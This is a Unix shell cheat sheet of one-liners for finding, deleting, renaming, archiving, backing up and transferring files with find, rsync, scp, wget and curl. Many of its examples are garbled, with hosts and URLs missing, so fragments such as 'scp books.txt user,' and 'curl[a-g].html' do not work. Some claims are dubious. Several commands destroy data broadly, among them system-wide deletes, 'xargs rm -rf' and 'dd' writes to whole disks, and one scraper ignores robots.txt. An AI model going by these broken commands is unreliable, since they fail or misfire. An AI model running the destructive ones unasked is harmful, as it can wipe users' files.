Create subdirectory and move files into it

 (ls; mkdir subdir; echo subdir) | xargs mv

File Paths ‹↑›

For a $FILE, extract the path, the filename, the filename without extension, and the extension

 FILENAME=${FILE##*/}; FILEPATH=${FILE%/*}; NOEXT=${FILENAME%.*}; EXT=${FILE##*.}

Get the full path to a file

 realpath examplefile.txt

get the top 10 longest filenames

 find | sed -e "s/^.*\///" | awk ' BEGIN { FS=""} { print NF " " $0 } ' | sort -nrf | head -10

Get the absolute path of a file

 absolute_path () { readlink -f "$1"; };

Searching For Files And Directories ‹↑›

This section covers techniques to search for and find files and folders on a Unix system. This mainly involves using the "find" program from the command line. This program is flexible and useful, but its syntax can initially seem to be unnecessarily complicated. For example "find filename" will not work.

The 'find' tool has an enormous number of options and operators to construct truly abstruse find commands.
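The general anatomy of a find command can be sketched as below; the folder 'testdir' and the file names are made-up examples.

```shell
# general form:  find <where> <tests> <action>
mkdir -p testdir/sub
touch testdir/a.txt testdir/sub/b.txt testdir/c.log

# <where> is the folder to start in; <tests> such as -name and -type
# select files; the <action> defaults to -print
find testdir -type f -name '*.txt'
```

This is why a bare "find filename" does not search for a file: find treats its first argument as a starting folder, so "find . -name filename" is needed.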

a find tutorial
Graphical search tools: Beagle, Google desktop

Note: for some reason "find / -name '*.c'" doesn't search all subfolders on some systems; in that case use the syntax "find /* ..." instead.

do a full file listing of every file found with locate

 locate searchstring | xargs ls -l

allow the user to select a file and print the chosen file

 zenity --file-selection --title 'select a file'

Find all directories on filesystem containing more than 99MB

 du -hS / | perl -ne '(m/\d{3,}M\s+\S/ || m/G\s+\S/) && print'

find all files with "tree" in the name in the current folder and subfolders

 find . -iname "*tree*"

search for files by name in a given folder

 find /dir/ -name '*name*'   quote the pattern so the shell does not expand it

best command for searching files

 find / -name \*string\*

Search through files, ignoring .svn

 find . -not \( -name .svn -prune \) -type f -print0 | xargs --null grep <searchTerm>

search the contents of '.c' and '.h' file types recursively

 find . -name "*.[ch]" | xargs grep "TODO"

Searching For Folders ‹↑›

find all directories in the system

 find /* -type d        the -print action is assumed
 find /* -type d -print the same as above
 find / -type d         on many computers the "*" may not be required

show all folders in the current folder

 find -maxdepth 1 -type d

find all subdirectories and print the full path name

 find $(pwd) -type d | less

find all directories which begin with a '.'

 find / -type d -name .\* -print
 find /* -type d -name .\* -print
for some reason the "/*" idiom is necessary on my computer

Finding Files By Name ‹↑›

find all c code files on the computer

 find /* -iname "*.c"   -iname does a case insensitive name search

find files in the current and subfolder with a ".txt" filename extension

 find . -name "*.txt"   this will find "index.txt" but not "index.TXT"

find all files whose names end with '.txt' or '.csv'

 find . -name "*.txt" -o -name "*.csv"
-o is the logical 'or' operator

 find . -name '*.txt' -o -name '*.csv'
the same, but not always

 find / -regex ".*\.\(txt\|csv\)"
the same, but a bit messy

find all files whose names end with '.txt' or '.csv' case insensitive

 find / -iregex ".*\.\(txt\|csv\)"       finds a.CSV, b.Txt, c.csV etc
 find . -iname "*.txt" -o -iname "*.csv" the same

find files which have 'tree' somewhere in the path or name

 find . -wholename '*tree*'
 find . -path '*tree*'  the same, but deprecated

find all non-html files

 find . -type f ! -name "*html"

Searching For Files By Size ‹↑›

Sort files greater than a specified size, in human readable format

 find ./ -size +10M -type f -print0 | xargs -0 ls -Ssh1 --color

Get the 10 biggest files/folders for the current directory

 du -sk * |sort -rn |head

Find all the files more than 10MB, sort in descending order of size

 find . -size +10240k -exec ls -l {} \; | awk '{ print $5,"",$9 }'|sort -rn > message.out

find files which are larger than 10 megabytes

 find / -size +10000000c -print
 find / -size +10M     the same but shorter and more readable

find files which are larger than 10 kilobytes

 find / -size +10k     the same but better

show file sizes in a readable format for all files bigger than 100k

 find . -size +100k -print | xargs du -sh | less
searches this & subfolders

 find . -size +100k | xargs du -sh | less        the same

delete all files in the current and subfolder which are bigger than 100k

 find . -size +100k | xargs rm   rather dangerous, this command!

a bash function which finds files bigger than an amount of meg

   function bigger {
    [ -z "$1" ] && echo "usage: $FUNCNAME filesize" && return 3
      find . -size +${1}M | xargs du -sh | less
   }

List top ten files/directories sorted by size

 du -sb *|sort -nr|head|awk '{print $2}'|xargs du -sh

Finding Files By Modification Time ‹↑›

show files in the home folder which have been modified in the last 24 hours

 find $HOME -mtime 0

find all files which have been modified in the last 7 days

 find / -mtime -7 -print
 find /* -mtime -7 -print   works better for me

remove files in the /tmp folder which haven't been modified in a week

 find /tmp -mtime +7 -exec rm -rf {} \;
 find /tmp -mtime +7 | xargs rm -rf  the same but nicer and maybe faster

compress log files which haven't been modified for a week

 find /var/log -mtime +7 -exec gzip {} \;

find files whose data was last modified more than 30 minutes ago

 find . -mmin +30

find files whose data was modified less than 30 minutes ago

 find . -mmin -30

files which were modified more recently than 'tree.txt'

 find . -newer tree.txt

By Access Time ‹↑›

find all files in the current folder tree accessed exactly 10 minutes ago

 find . -amin 10

find files accessed more than 10 minutes ago

 find . -amin +10

find files accessed less than 10 minutes ago

 find . -amin -10

find files which were accessed after the file 'tree.txt' was modified

 find . -anewer tree.txt

find files which were last accessed more than 48 hours ago

 find . -atime +2

find files which were last accessed less than 48 hours ago

 find . -atime -2

By File Type ‹↑›

find all empty files and folder in this and all subfolders

 find . -empty

find all executable files (not folders)

 find . -type f -executable

find all image files on the computer

 find / | xargs file | grep image | less

Finding Text Files ‹↑›

find files which contain the word 'big' in this folder and subfolders

 find . -type f -print | xargs grep -l big
 grep -rl big *  this is the same but not all greps have the 'r' option

find all files having the phrase 'big boy' in the 'doc/books' folder tree

 grep -rl 'big boy' doc/books    this is a case sensitive search
 grep -ril 'big boy' doc/books   finds 'big boy', 'BiG Boy' etc
 grep -sril 'big boy' doc/books  don't show any error messages
 grep -sri 'big boy' doc/books  show matching lines, not just filenames

find all ".html" files in "/etc" which do *not* contain the "<img" tag

 find /etc -iname "*.html" | xargs grep -L "<img"

find all files with names ending in '.html' or '.php' containing the word 'big'

 find / \( -name \*.html -o -name \*.php \) | xargs grep -i "big"
this uses the tool 'xargs' instead of a 'for' loop

find all text files in the current directory and all subfolders

 find . | perl -lne '-T "$_" and print "$_"' | less
 find . | perl -lne '-T $_ and print $_' | less  the same, I think...

Finding Files By Permissions ‹↑›

find files not readable by all users

 find -type f ! -perm -444

find folders which are not accessible for all users

 find -type d ! -perm -111

Complex Find Expressions ‹↑›

Find can use logical operators on each condition. This makes it possible to construct complex, and hopefully powerful find commands.
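A small sketch of the operators in action; the 'demo' folder and its files are hypothetical.

```shell
mkdir -p demo
touch demo/a.txt demo/b.csv demo/c.log

# \( ... \) groups tests, -o means OR, -a (or simple juxtaposition)
# means AND, and ! negates a test
find demo -type f \( -name '*.txt' -o -name '*.csv' \)

# every file which is NOT a csv file
find demo -type f ! -name '*.csv'
```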

find all files ending in '.csv' which are real files and list them

 find / -type f -name "*.csv"
 find / -type f -a -name "*.csv"  the same, '-a' means logical and

use the 'and' logical operator

 find / -type f -a -name "*.csv"  the -a is not necessary

use the 'or ' logical operator: find files ending in .txt or .csv

 find / -name '*.txt' -o -name '*.csv'

find files ending in '.xls' or '.csv' which are real files (not folders etc)

 find / -type f \( -name "*.xls" -o -name "*.csv" \) -exec ls -l {} \;

find all files whose names don't end in '.csv'

 find . \! -name '*.csv'

Doing Something With Found Files ‹↑›

Find also supports the '-exec' option, which performs an action on each found file, but it is often faster to use 'xargs' instead.
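The styles can be compared side by side; 'confdemo' is a made-up test folder. The '+' terminator batches many files into one command, which is why it (and xargs) is usually faster than '\;'.

```shell
mkdir -p confdemo
touch confdemo/a.conf confdemo/b.conf

find confdemo -name '*.conf' -exec ls {} \;          # one ls process per file
find confdemo -name '*.conf' -exec ls {} +           # one ls for many files
find confdemo -name '*.conf' -print0 | xargs -0 ls   # the xargs way;
# -print0 and -0 keep filenames containing spaces safe
```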

 find / -type f \( -name "*.xls" -o -name "*.csv" \) -exec ls -l {} \;

the -exec option can be used to carry out an action on the found files

 find . -name "*" -exec cp "{}" img \;

delete all files whose names end in '.txt' in this and all subfolders

 find . -name '*.txt' -delete          a bit dangerous, but anyway
 find . -name '*.txt' -exec rm {} \;   the same, if you like typing
 find . -name '*.txt' -exec rm "{}" \; the same, with extra quoting
 find . -name '*.txt' | xargs rm       the same, might be faster

delete each file but ask the user for confirmation

 find . -name '*.txt' -ok rm {} \;
 find . -name '*.txt' -ok rm "{}" \;         better

display the file type information about each file in this folder tree

  find . -type f -exec file '{}' \;

Locating Files ‹↑›

The 'locate' tool is faster than find, because it uses an 'index' which has to be updated when the filesystem changes.

find a file anywhere on the system using the index

 locate filename

update the file name database for the locate command

 updatedb       this usually needs to be run as root

find all executable files in the current and subfolder with 'tree' in the name

 find . -name "*tree*" | perl -lne '-x and print'
 find . -name "*tree*" | perl -lne '-x && print'          the same
 find . -name "*tree*" | perl -lne '-x $_ and print $_'   the same

Renaming And Moving Files ‹↑›

smart renaming of files

 ls | sed -n -r 's/banana_(.*)_([0-9]*).asc/mv & banana_\2_\1.asc/gp' | sh

convert filenames in current directory to lowercase

 for i in *; do mv "$i" "$(echo $i|tr A-Z a-z)"; done

recursively change file names from uppercase to lowercase

 find . -type f | while read f; do mv "$f" "$(echo $f | tr '[:upper:]' '[:lower:]')"; done

Remove spaces from jpg filenames

 rename "s/ *//g" *.jpg

Rename .JPG to .jpg recursively

 find /path/to/images -name '*.JPG' -exec rename 's/\.JPG$/.jpg/' {} \;

rename all '.html' files in the folder to '.php'

 rename 's/\.html$/.php/' *.html  index.html will become index.php

rename uppercase file names to lower-case

 rename 'y/A-Z/a-z/' *

show what renaming would happen but don't actually do anything

 rename -n 's/\.htm$/.html/' *.htm

rename all files on the entire computer from "htm" -> "html"

 find /* -name "*.htm" | xargs rename 's/\.htm$/.html/'
 find /* -name "*.htm" -exec rename 's/\.htm$/.html/' "{}" \;  slower

Note: the "xargs" version is much faster than the "-exec" version, though using "xargs -I {} cmd {}" slows xargs down a lot in this case.
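One way to see the speed difference for yourself is a rough timing sketch like the following (the 'timedemo' folder is a made-up example):

```shell
mkdir -p timedemo
touch timedemo/file{1..200}.htm

# one process per file: slow
time find timedemo -name '*.htm' -exec true {} \;
# one process for (almost) all the files: fast
time find timedemo -name '*.htm' | xargs true
```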

Batch file name renaming (copying or moving) w/ glob matching.

 for x in *.ex1; do mv "${x}" "${x%ex1}ex2"; done

get only the first component of a Unix style file name

 f=/user/home/hh.html; echo $f | sed "s*^/**" | cut -d '/' -f 1
this prints "user"

Deleting Files ‹↑›

delete files except some file

 find . | grep -v filename | xargs rm

Removes file with a dash in the beginning of the name

 rm -- --myfile

List and delete files older than one year

 find <directory path> -mtime +365 -and -not -type d -delete

Delete files if not have some extension

 ls -1 | grep -v '\.jpg$' | xargs rm

empty the trash folder

 alias trash="rm -fr ~/.local/share/Trash"

may be the optimal way of deleting huge numbers of files

 find /path/to/dir -type f -delete

Verbosely delete files matching specific name pattern, older than x

 find /backup/directory -name "some*" -mtime +15 | xargs rm -vf

Watch how fast the files in a drive are being deleted

 watch "df | grep /path/to/drive"

Remove a file whose name begins with a dash ( - ) character

 rm ./-filename

Erase empty files

 find . -size 0 -print0 | xargs -0 rm

Delete files older than 5 days

 find /dir_name -mtime +5 -exec rm {} \;

remove files and directories which haven't been accessed in the last 20 minutes

 find -amin +20 -delete

remove all files with the extension ".dvi" and ".log"

 rm *.{dvi,log}

Remove all but the 5 most recent file in a directory.

 rm `ls -t | awk 'NR>5'`    the old bash syntax
 rm $(ls -t | awk 'NR>5')   the same, but new syntax

securely erase unused blocks in a partition

 # cd $partition; dd if=/dev/zero of=ShredUnusedBlocks bs=512M; shred -vzu ShredUnusedBlocks

Copying Files ‹↑›

copy lots of files from the current folder to the folder "img"

 find . -name "*" | xargs -I {} cp {} img  may be faster than -exec
 find . -name "*" -exec cp "{}" img \;
"cp * img/" may fail with "argument list too long";
find with "-exec" or "xargs" is much faster than a "for" loop

A rather slow "for" loop for copying files

 for i in *; do cp $i img/; done

Symbolic Links To Files ‹↑›

make a symbolic link to the mounted hard drive in the home folder

 ln -s /mnt/hda1 ~/disk
 ln -s /path/to/original /path/to/link      general format

make a link to '.bashrc' in the current folder.

 ln -s ~/.bashrc   the symbolic link will be called '.bashrc'

delete a symbolic link

 rm link         the original file is not deleted

see where a symbolic link points to

 ls -l link

File Compression ‹↑›

Create a tar archive using 7z compression

 tar cf - /path/to/data | 7z a -si archivename.tar.7z

backup and remove files with access time older than 5 days.

 tar -zcvpf backup_`date +"%Y%m%d_%H%M%S"`.tar.gz `find <target> -atime +5` && find <target> -atime +5 -delete

Extract a remote tarball in the current directory without saving it locally

 curl <url> | tar zxvf -

Extract tarball from internet without local saving

 wget -O - <url> | tar xz

Gzip files older than 10 days matching *

 find . -type f -name "*" -mtime +10 -print -exec gzip {} \;

Zip all subdirectories into zipfiles

 for f in `find . \( ! -name . -prune \) -type d -print`; do zip -r "$f.zip" "$f"; done

Pack up some files into a tarball on a remote server without creating a local file

 tar -czf - * | ssh user@host "cat > files.tar.gz"

backup a directory in a timestamped tar.gz

 tar -czvvf backup$(date "+%Y%m%d_%H%M%S").tar.gz /path/to/dir

Create a tar.gz in a single command

 tar cvf - foodir | gzip > foo.tar.gz

Extract tar.gz in a single command

 gunzip < foo.tar.gz | tar xvf -

Create a zip file ignoring .svn files

 zip -r archive.zip DIR -x "*/.svn/*"

Remove all files previously extracted from a zip file

 unzip -lt file.zip | grep testing | awk '{print $2}' | xargs rm -r

Remove all files previously extracted from a tar(.gz) file.

 tar -tf <file.tar.gz> | xargs rm -r

List contents of tar archive within a compressed 7zip archive

 7z x -so testfile.tar.7z | tar tvf -

Extract neatly a rar compressed file

 unrar e file.part1.rar; if [ $? -eq 0 ]; then rm file.part*.rar; fi

Compare an archive with the file-system

 tar dfz horde-webmail-1.2.3.tar.gz

compress a file and watch the progress

 tar cf - user | pv | gzip > /tmp/backup.tar.gz

Create a self-extracting archive for win32 using 7-zip

 7z a -sfx archive.exe /path/to/archive

Compression formats Benchmark

 for a in bzip2 lzma gzip; do echo -n > $a; for b in $(seq 0 256); do dd if=/dev/zero of=$b bs=$b count=1; c=$(date +%s%N); $a $b; d=$(date +%s%N); total=$(echo $d-$c | bc); echo $total >> $a; rm -f $b *.bz2 *.lzma *.gz; done; done

list the contents of a .gz compressed tar archive file

 tar ztvf file.tar.gz   nothing is uncompressed or extracted

list the contents of a .bz2 compressed tar archive file

 tar jtvf file.tar.bz2

uncompress a ".bz2" compressed file

 bunzip2 filename.txt.bz2

for files ending with ".Z" use "uncompress"

 uncompress file.Z

view the contents of the compressed file 'comp.gz'

 zcat comp.gz

page through the contents of a compressed file

 zless filename

compress a file as small as possible with gzip

 gzip --best file

browse a compressed directory

 mc      the gnu midnight commander, uses 'curses'

create a compressed archive of the folder 'dir' in file 'dir.tar.gz'

 tar -cvz --exclude='*.exe' -f dir.tar.gz dir
excludes all filenames ending with '.exe'

Compress files found with find

 find ~/bin/ -name "*sh" -print0 | xargs -0t tar -zcvf foofile.tar.gz

Create a zip archive excluding all SVN folders

 zip -r archive.zip . -x '*.svn*'

Archives Of Files ‹↑›

A file archive is a way to combine many different files within one file, optionally compressing (reducing the size of) each file included in the "archive" file. The purpose of creating file archives is to facilitate making backups of files or for transferring files from one computer to another.
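A minimal round trip with tar may make the idea concrete; the 'project' folder is a made-up example.

```shell
mkdir -p project
echo hello > project/readme.txt

tar czf project.tar.gz project/      # c=create, z=gzip compress, f=file
tar tzf project.tar.gz               # t=list the contents, nothing is extracted
mkdir -p elsewhere
tar xzf project.tar.gz -C elsewhere  # x=extract, -C extract into this folder
cat elsewhere/project/readme.txt     # prints: hello
```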

Compress archive(s) or directory(ies) and split the output file

 rar a -m5 -v5M -R myarchive.rar /home/

Split a tarball into multiple parts

 tar cf - <dir>|split -b<max_size>M - <name>.tar.

Unrar all files in a directory

 for f in *.rar; do unrar e "$f"; done

Tar - Compress by excluding folders

 tar -cvzf arch.tgz $(find /path/dir -not -type d)

Slightly better compressed archives

 find . \! -type d | rev | sort | rev | tar c --files-from=- --format=ustar | bzip2 --best > a.tar.bz2

Archive a directory with datestamp on filename

 tar zcvf somedir-$(date +%Y%m%d-%H%M).tar.gz somedir/

display the files contained in the "tar" archive file "archive.tar"

 tar tvf archive.tar
the 'v' option prints each file which is added to the archive

append files with names ending in ".txt" to the archive file "text.tar"

 tar rvfn text.tar *.txt
 tar -rvfn text.tar *.txt   this is the same, the "-" is optional

create an archive file "new.tar" and append all "c" source files to it

 tar -cvf new.tar *.c
 tar cvf new.tar *.c        the same

create an archive file "new.tar" of the folder /etc/lynx

 tar cvvf new.tar /etc/lynx  "vv" means "extra verbosity"

extract all files from a "tar" archive file

 tar xvf myfile.tar

Backups Of Data And Disks ‹↑›

A backup is essentially a copy of data which is stored in a different place from the original data, and which hopefully will combat the laws of entropy.

File Backups ‹↑›

On unix-style systems, backup files have traditionally had a '~' extension.

add a backup (or any other) suffix to the file 'data'

 mv -vi data{,~}
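The '{,~}' trick relies on the shell's brace expansion, which happens before 'mv' ever runs; a quick way to see what the shell actually produces:

```shell
echo data{,~}          # the shell expands this to: data data~
echo file.txt{,.bak}   # and this to: file.txt file.txt.bak
```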

Create a quick back-up copy of a file

 cp file.txt{,.bak}

Create a backup of the file 'fo/list' with todays timestamp

 cp fo/list{,-$(date +%Y-%m-%d)}

quickly backup or copy a file 'list.txt' with bash

 cp -bfS.bak list.txt list.txt

remove backup files (with the '~' extension)

 find / -name '*~' -delete
 locate '*~' | xargs rm    faster but not as thorough

never rewrite a file while copying (or moving)

 cp --backup=t source.file target.file

a function to create backups with a day-time timestamp

 backup() { for i in "$@"; do cp -va $i $i.$(date +%Y%m%d-%H%M%S); done }

Folder Backups ‹↑›

backup directory. (for bash)

 cp -pr directory-you-want-to-backup{,_`date +%Y%m%d`} # for bash

create a separate backup file for all files in current folder

 find . -maxdepth 1 -type f -print0 | xargs -0 -i cp ./{}{,.bak}

Remote Backups ‹↑›

Backup a filesystem to a remote machine and use cstream to

 nice -n19 dump -0af - /<filesystem> -z9|gpg -e -r <gpg key id>|cstream -v 1 -t 60k|ssh <user@host> "cat > backup.img"

Send a backup job to a remote tape drive on another machine over ssh

 tar cvzf - /directory/ | ssh root@host "cat > /dev/nst0"

backup and synchronize entire remote folder locally (curlftpfs and

 curlftpfs ftp://username:password@ftpserver /tmp/remote-website/ && rsync -av /tmp/remote-website/* /usr/local/data_latest && umount /tmp/remote-website

Disk Backups ‹↑›

check the status of 'dd' in progress

 watch -n 10 killall -USR1 dd

Backup of a partition

 cd /mnt/old && tar cvf - . | ( cd /mnt/new && tar xvf - )

make a backup of an entire hard disk (the first one), saving to a file

  dd if=/dev/hda of=/path/to/image/file

make a backup of the second hard disk, compress it and write to a file

 dd if=/dev/hdb | gzip > /path/to/image.gz

restore a backup of the hard disk /dev/hdb

 dd if=/path/to/image of=/dev/hdb

restore a compressed backup of a hard disk

 gzip -dc /path/to/image.gz | dd of=/dev/hda

create a backup of the master boot record and partition table of the 'hdb' disk

 dd if=/dev/hdb of=/path/to/image count=1 bs=512

Restoring A Backup ‹↑›

Restore a local drive from the image on remote host via ssh

 ssh user@server 'dd if=sda.img' | dd of=/dev/sda

Transfering Files ‹↑›

A wide range of programs are available to transfer files between different computers on a network, and each has its own particular speciality

tools for copying files
cp - the standard unix copy tool
rsync - copy files across the network
install - copies files and sets the permissions

share files through the http port 80

 nc -w 5 -v -l -p 80 < file.ext

transfer files using the batch commands in the file 'ftp.txt'

 sftp -b ftp.txt user@host

copy a file over the secure shell 'ssh' without 'scp'

 cat file.txt | ssh user@host "cat > file.txt"

share the current directory tree (via http) at http://$HOSTNAME:8000/

 python -m SimpleHTTPServer

Scp ‹↑›

The secure copy program is allegedly faster than 'sftp' mode, and uses ssh encryption. For transferring entire folders the 'rsync' program should probably be used instead. Scp appears incapable of transferring 2 different files to 2 different folders; for that, see sftp. Without the '-r' switch scp won't transfer folders.

transfer 'book.txt' to the books folder of a sourceforge site server

 scp books.txt user,

upload files 'f' and 'g' into the webfolder on a sourceforge server

 scp f g user,

download files 'f' and 'g' from a sourceforge server to this folder

 scp user,"htdocs/f htdocs/g" .

upload (overwriting) all files in the current folder to the folder 'doc/books/' to the 'eva' account on the server ''

 scp *

upload and overwrite all '.txt' files to the 'doc/' folder on

 scp *.txt

scp a good script from host A which has no public access to host

 cat nicescript |ssh middlehost "cat | ssh -a root@securehost 'cat > nicescript'"

bash function to upload a file via scp to the 'rpike' a/c on the server

 upfile() { scp "$1" rpike@server:"$1"; }

Easily scp a file back to the host you're connecting from

 mecp () { scp "$@" ${SSH_CLIENT%% *}:Desktop/; }

download 2 files from the server using the account 'user'

 scp"chap1.txt chap2.txt" ~/books

upload the 'books' folder to the server '' with account 'bob'

 scp -r ~/logs   consider using rsync instead

download all the files in the 'books' folder to the current local folder

 scp* .   no subfolders are downloaded

copy the file 'file.txt' from the '' host to the ''


scp file from hostb to hostc while logged into hosta

 scp user@hostb:file user@hostc:

Complex Scp ‹↑›

create a list of file names from local folders

 d=$(echo ~/sf/htdocs/books/*/); d="basename "${d// /;basename }; d=$(eval $d); d=$(echo $d | sed -r 's:[a-z-]+:htdocs/books/&/&-book.txt:ig'); echo $d

create a list of file names from local folders and download them

 d=$(echo ~/sf/htdocs/books/*/); d="basename "${d// /;basename }; d=$(eval $d); d=$(echo $d | sed -r 's:[a-z-]+:htdocs/books/&/&-book.txt:ig');  echo $d; scp user,"$d" .

Sftp ‹↑›

sftp transfers files using the encrypted ssh (secure shell) protocol and is thus 'safer' and more modern than 'ftp'. sftp is designed to be used interactively by the user, but can also run in batch mode with the '-b' switch.

using sftp in batch mode to upload to the sourceforge web server

 sftp -b a.txt user, > /tmp/sftp.log
 the file 'a.txt' contains 'cd books; put chap1.txt; bye;'
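Such a batch file can be written from the shell with a here-document; the file names and the 'user@host' address are placeholders.

```shell
# each line of the batch file is one sftp command
cat > batch.txt <<'EOF'
cd books
put chap1.txt
bye
EOF

# then run it non-interactively, e.g.:
#  sftp -b batch.txt user@host
cat batch.txt
```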

Rsync ‹↑›

Rsync is a very powerful network file copying program. It is particularly nice because it only transfers the parts of the files which have changed (the 'difference' to the old files). This saves a great deal of bandwidth and is probably the most efficient and pleasant way to develop a website. It is a program with a very large number of options to fine tune the way the file transfers take place.

Note: If the source path ends with "/" then the contents of the folder are copied but the folder itself is not

remote file transfer programs
ftp unencrypted file transfer (older)
sftp encrypted file transfer with user interaction
scp encrypted file transfer, non-interactive (faster than sftp)
wget http recursive file download, suitable for a bad connection
curl like wget but with some more options
rsync an efficient and flexible remote copy program
bittorrent distributed file transfer

create an incremental backup of a directory using hard links

 rsync -a --delete --link-dest=../lastbackup $folder $dname/

Simple Usage Of Rsync ‹↑›

the general form of rsync is

 rsync [options] source destination

download files from folder 'path' on the server to a local folder

   rsync -avP /local/folder/                    
   rsync -avP -e ssh /local/folder/ ##(using ssh) 
     -a archive mode
     -P keep partially transfered files, and show progress
        during the transfer of files

copy recursively all files and folders from src/bar to /data/tmp/bar

 rsync -avz machine:src/bar /data/tmp
note that a new directory "bar" may be created within '/data/tmp'

copy recursively all files and folders from src/bar/ to /data/tmp

 rsync -avz foo:src/bar/ /data/tmp

Note that NO directory "/data/tmp/bar" will be created

rsync tools
grsync - a very basic graphical version of rsync with gtk
-g preserve the group information of the files (where possible)
-o preserve file owner information
-D preserve device and special files (where possible)
-z compress file data during the transfer

copy all files from the current folder to "htdocs/books/" on the server

 rsync -rv --exclude=*.swp . user@server:htdocs/books/

The contents of the current folder are copied but not the folder itself. Files with names ending in '.swp' are not copied because of the --exclude option.

Remote copy directories and files through an SSH tunnel host

 rsync -avz -e 'ssh -A sshproxy ssh' srcdir remhost:dest/path/

copy files displaying a progress bar.

 rsync -av --progress ./file.txt user@host:/path/to/dir

rsync + find

 find . -name "whatever.*" -print0 | rsync -av --files-from=- --from0 ./ ./destination/

Local Copying ‹↑›

Instead of using 'cp' one may use rsync instead to copy and synchronise large folders. This has the advantage that not all the files need be copied, only those that have changed.

synchronise the users 'web' folder with a folder on a usb key

 rsync -r ~/web/ /media/KINGSTON/web/
 rsync -r ~/web/ /media/KINGSTON/web   the same
 rsync -r ~/web /media/KINGSTON/       the same
 rsync -rv ~/web/ /media/KINGSTON/web  the same, but verbose
 rsync -rvn ~/web/ /media/KINGSTON/web/ just see what would happen

The trailing '/' on ~/web/ is important since it determines whether rsync will copy just the contents of the folder or the folder itself.

copy the folder 'big' from the current folder to the '/home/user/' folder

 rsync -r big /home/user/
 cp -r big /home/user/  this is more or less the same

copy the folder 'big' to the users home folder exclude 'iso' files

 rsync -rv --progress --exclude=*.iso big ~/  progress is shown

Excluding Files From Rsync Transfers ‹↑›

upload files excluding the directory 'images'

 rsync -r --exclude='images' /local/dir/

The local folder /local/dir/images is not uploaded to the remote computer.

synchronise by uploading all files except 'png' & 'jpg' images

 rsync -r --exclude=*.png --exclude=*.jpg /local/dir/

upload all files except 'pdf' documents and the /local/dir/images folder

 rsync -r --exclude=*.pdf --exclude=images /local/dir/

upload files excluding everything listed in the file '/path/list.txt'

 rsync --exclude-from '/path/list.txt' /local/dir/
an absolute path for the exclude file seems to be necessary, 2008

for very large transfers, consider bittorrent instead.

Problems ‹↑›

There seems to be no short option for --exclude. It also seems impossible to pass a list of files to a single --exclude option.

Deleting Destination Files With Rsync ‹↑›

see what files would be deleted with the "--delete" option

 rsync -rnv --delete /home/user/ user@server:path/
 rsync -rv --delete --dry-run /home/user/ user@server:path/   the same
this should always be done before using "--delete"

recursively upload the contents of /home/ and delete destination files not found in the source folder tree (this can be dangerous!, first use "-n")

 rsync -r --delete /home/ user@server:path/

upload the '/home/' folder to a server with rsync over ssh, excluding '.c' files and deleting '.c' files at the destination

 rsync -rv --delete-excluded --exclude=*.c /home/ user@server:path/

upload recursively the current directory excluding the folder "tree" and deleting the folder "tree" at the destination

 rsync -rv --delete-excluded --exclude=tree  . user@machine:/books/web

 rsync -avP -e ssh /local/folder/

copy all files from the "/home/user/" folder to path/ on the server

 rsync -e ssh /home/user/*
this is not a recursive copy; folders are not copied; the shell handles "*"

Symbolic Links And Rsync ‹↑›

upload files, copying the target of symbolic links

 rsync -rv --copy-links /local/folder/
 rsync -rvL /local/folder/ the same

Sourceforge ‹↑›

see what a sourceforge download with rsync would do without doing anything

 rsync -rvn -e ssh user, ~/work/htdocs'

upload to an sf project folder excluding vim swap files

 rsync -rv --exclude='*.swp' -e ssh ~/sf/htdocs/books user,'
if it doesn't exist, the 'books' folder is created on the server

get a project web-folder from sourceforge showing progress

 rsync -r --progress -e ssh user, ~/work/htdocs'

Uploading Files ‹↑›

use rsync, sftp, ftp,

Downloading Files ‹↑›

Downloading refers to the process of transferring files from a remote computer (somewhere on the internet, or just in the next room) to the computer on which you are working.

Tools: wget, curl

Wget has the advantage that it works on slow and precarious internet connections and can be scripted and scheduled. Curl is very similar to wget but provides a few extra features.

snarf is a command line resource grabber.


Download an entire ftp directory using wget

 wget -r

Download from Rapidshare Premium using wget - Part 2

 wget -c -t 1 --load-cookies ~/.cookies/rapidshare <URL>

mirror a yahoo geocities site, accepting only txt, html ... etc

 wget -nH -m -Atxt,html,js,java,class,css -Isitename

resume downloading a file from the internet

 wget -c url    wget automatically retries getting the file

download a file limiting the download rate to 20k/second

 wget --limit-rate=20k url
this prevents wget hogging the available network bandwidth

get all the URLS contained in the file "list.txt"

 wget -i list.txt

download the html file and save it to the folder "tree"

 wget -P"tree"

download all ".gif" files from a web folder

 wget -r -l1 --no-parent -A.gif http://host/folder/

mirror a website without overwriting any existing local files

 wget -nc -r

Download an entire website

 wget --random-wait -r -p -e robots=off -U mozilla

download a file and output to standard output

 wget -O -

get all the pages linked to by the page "links.html"

 wget -O - http://host/links.html | wget --force-html -i

check the validity of links in the file bookmarks.html

 wget --spider --force-html -i bookmarks.html

mirror the site, with 3 retries logging errors in 'mirror.log'

 wget -m -t3 -o mirror.log

use wget but pretend to be the "Konqueror" browser

 wget --user-agent="Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.98 (like Gecko)"
some sites may block access to wget to reduce server load

pretend to be the "Lynx" text mode browser

 wget -U "Lynx/2.8.7dev.9 libwww-FM/2.14" http://site

download free ebooks from

  # pretends to be firefox, recurses to 2 levels
  wget -erobots=off --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008092416 Firefox/3.0.3" -H -r -l2 --max-redirect=1 -w 5 --random-wait -PmyBooksFolder -nd --no-parent -A.pdf

Using Curl ‹↑›

The curl utility is very similar to 'wget' but provides a few extra tricks.

HTTP Get of a web page via proxy server with login credentials

 curl -U username[:password] -x proxyserverIP:proxyserverPort webpageURI

get a file while pretending to be netscape 4.73 browser

 curl -A "Mozilla/4.73 [en] (X11; U; Linux 2.2.15 i686)" [URL]

follow http redirects (where the page is automatically refreshed to another)

 curl -L

use url 'globbing' to get several pages

 curl http://site.{one,two,three}.com

use arithmetic 'globbing' of urls to retrieve lots of pages

this will retrieve file1.txt, file2.txt, file3.txt ...
this will retrieve file001.txt, file002.txt, ... file099.txt, file100.txt

specify an alphabetic sequence of urls to retrieve

 curl[a-g].html  will get a.html, b.html, ... g.html

various sequences can be included to get lots of files


specify a sequence of urls to retrieve with a 'step' value (since 7.15.1)

 curl[1-100:10].txt gets 1.txt, 11.txt, 21.txt ...
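Since curl expands the [1-3] glob itself before fetching, the behaviour can be tried without a network by pointing the glob at local file:// URLs (a sketch, assuming curl is installed; the files and names are made up for the demonstration):

```shell
# create three numbered files and fetch them with one globbed URL
tmp=$(mktemp -d)
for i in 1 2 3; do echo "part$i" > "$tmp/$i.txt"; done

# [1-3] is expanded by curl itself into three URLs, fetched in order
curl -s "file://$tmp/[1-3].txt"
```

The output is the concatenation of part1, part2 and part3, one per line.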

